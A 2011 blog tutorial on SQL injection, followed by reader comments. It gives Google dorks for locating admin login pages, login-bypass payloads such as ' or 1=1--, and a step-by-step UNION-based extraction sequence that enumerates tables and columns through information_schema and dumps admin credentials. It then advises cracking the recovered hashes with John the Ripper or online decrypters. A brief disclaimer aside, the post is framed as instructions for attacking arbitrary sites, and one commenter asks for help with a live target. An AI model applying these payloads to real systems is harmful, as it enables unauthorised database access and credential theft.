Sql Injection | Basic and Detail Tutorial.

What is SQL injection ?

SQL(Structured Query Language) injection or insertion is an attack technique that exploits the vulnerability of the web application that communicates with the database of the server.This type of attack is successful if the application fails to validate the user supplied inputs in sql statements to communicate with the database there by allowing the attacker to gain control of all database resources.
Lastly I would like to mention that the application level vulnerability is exploited rather than the server or database side vulnerbility.
I recommend readers if they abide by the blog's Disclaimer then they can proceed reading this post otherwise leave this page immediately.
Basic Sql Injection:
.Asp based websites are basically more vulnerable to this type of attack.So we can use Goolge dorks to find out few sites.

"inurl:admin.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:administratorlogin.asp"
"inurl:administrator_login.asp"

and many more here.

Bypassing Login Screen:
Now that we have arrivied at the administration page we need to enter "admin",admin'--,admin'#,admin'/* etc in username section and the below sql injections in the password section.

' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1—
and many more are there.

Extended SQl Injection:

1.Concept behind Error messages

a.Eg:- http://www.website.com/index.php?id=49'

b.A ' is need to be added after the digit 49.

c.An error as below proves that it is vulnerable to SQL injection.
d.If nothing is shown up then it is vulnerable to "Blind SQL injection".

2.Now we need to find the no.of columns in the database by using "ORDER function".
As we got error at "10" so the no of columns in the database is "9".

3.Now we need to find the most vulnerable column by using "UNION function"

http://www.website.com/news.php?id==-49 union all select 1,2,3,4,5,6,7,8,9--

a.Look out for some random number in the screen as shown below.

b.Dash "-" is compulsory (id=-32) instead of (id=32)

c.Now, if this displays an error/blank page, just move on to the next site.

d.If it displays a couple numbers on the page, congrats! The site is vulnerable.

4.Now we need to find the SQL database version of the site.
http://www.website.com/news.php?id==-49 union all select 1,2,3,4,5,6,7,8,@@version--

Injection for VERSION 4:

If you get version 4 from the above step then it will be bit difficult as we have to guess the tables and columns.There we have to adapt the hit and trail methods and the chance of success is very limited.


Injection for VERSION 5 and above:

1.Now we need to find the tables of the above vulnerable column.

a.Tables are always lying into the information_schema.tables‘s Database.So to extract tables from it the query is like below.
http://www.website.com/news.php?id=-49 union all select 1,2,3,4,5,6,7,8,table_name from information_schema.tables where table_schema=database()

b.Most vulnerable column is 9 so we have put table_name inplace of 9.

c.It will only show the first table name which is lying in the database at the top.But to show all the tables “group_concat(table_name)” function is used.

d.http://www.website.com/news.php?id=-49 union all select 1,2,3,4,5,6,7,8,group_concat(table_name) from information_schema.tables where table_schema=database()

OR
http://www.website.com/news.php?id=-49 union all select 1,2,3,4,5,6,7,8,group_concat(table_name) from information_schema.tables
e.We got cms_comments,cms_docs,cms_user etc... as tables.

2.Now we need to find the columns from the desired table.Here it is cms_user.

a.The input string need to be converted into Decimal/Ascii equivalent inorder to communicate with the database.

b.You may use (http://easycalculation.com/ascii-hex.php) to convert any string to Decimal/Ascii equivalent or you can also use a Firefox Addon.
c.With cms_user as input the ASCII value is 99 109 115 95 117 115 101 114.

d.http://www.website.com/news.php?id=-49 union all select 1,2,3,4,5,6,7,8,group_concat(column_name) from information_schema.columns where table_name=char(99 109 115 95 117 115 101 114) is the modified code.

e."group_concat" used for all columns and since we are concerned with columns so "information_schema.columns" is used instead of "information_schema.tables".
f.Here we got id,c_name,f_name as the columns of the table cms_user.

g.In order to retrive datas it is needed to replace group_concat(column_name) with group_concat(id,0x3a,c_name,0x3a,f_name) from cms_user here "0x3a" is just the colon and that will separate the contents which we will retrieve.
http://www.website.com/news.php?id=-49 union all select 1,2,3,4,5,6,7,8,group_concat(id,0x3a,c_name,0x3a,f_name) from cms_user

*So all ids,c_name values,f_name values on the screen.Similarly if you get the admin table and you found some columns of admin_name and password then you have to implement the query as,Group_concat(admin_name,0x3a,password)from admin here
admin_name and the password are the columns and admin is the table name.

*If the password in encrypted form then we have to use few tools like John the ripper,Cain & Able or if it is md5 or any other encrypted then we may use few online decrypter which you can get through google.You may use the list of few online decrypter I have provided here.


Few important points:

1.We can use instead of -- put /* or even nothing in the above statements.

2.In order to find the version of the database we can use @@version or version() and may use user(),database() to check the database type and user.

3."0x3a" is used as separator of the retrieve data,it is only a colon.

4.A "'" is need to be added inorder to check the vulnerability if nothing is shown up then it may be under "Blind Sql Injection"

By: Chintan Gurjar and edited,updated by Satyajit Das(Admin).

About Chintan Gurjar:He is an Ethical Hacking enthusiast and a final year B.tech student form Ahmedabad, India and a nice person you can catch him here.
Sql Injection | Basic and Detail Tutorial. Sql Injection | Basic and Detail Tutorial. Reviewed by Satyajit (Admins,a.k.a Satosys) on Monday, January 17, 2011 Rating: 5

12 comments:

Ganesh Babu said...

now a days php is getting lots of security by default,, some of the security issues are not working like bypassing login screen, etc.,

Praveen@Techperk said...

you are the real techie, may be i will use you one day brother :)

Rohit Batra said...

Excellent Illustration of SQL Injection...you cleared out my some doubts..

Rajiv Vapor said...

This shows best technical knowledge, & these pitfalls on web pages are used, best example of sql injection hopes for knowledgeable information.

prateek sharma said...

thank you very much dear,

nice job

gagan said...

it's explain very good way in deeply ...

Arjun said...

Thanks for explaining with Demo images, this will make clear about the SQL Injection.

Scott Adams said...

I heard that SQL injection is being used by internet marketers and webmasters. I wonder how they do it.

Kolači said...

Cool tut. I can get until step where i have to find a table name. then nothing shows. i think DB is sybase because version of database is 9.0.2.2451. Can you help me please?

Rajesh Namase said...

Very resourceful article, thanks for posting. I learned new thing today.

Voltures of USA said...

Wow, i like this lesson
very organised articles
Thanks

Anonymous said...

Data logging

This is very helpful blog for me i am very thankful for this blog.

Powered by Blogger.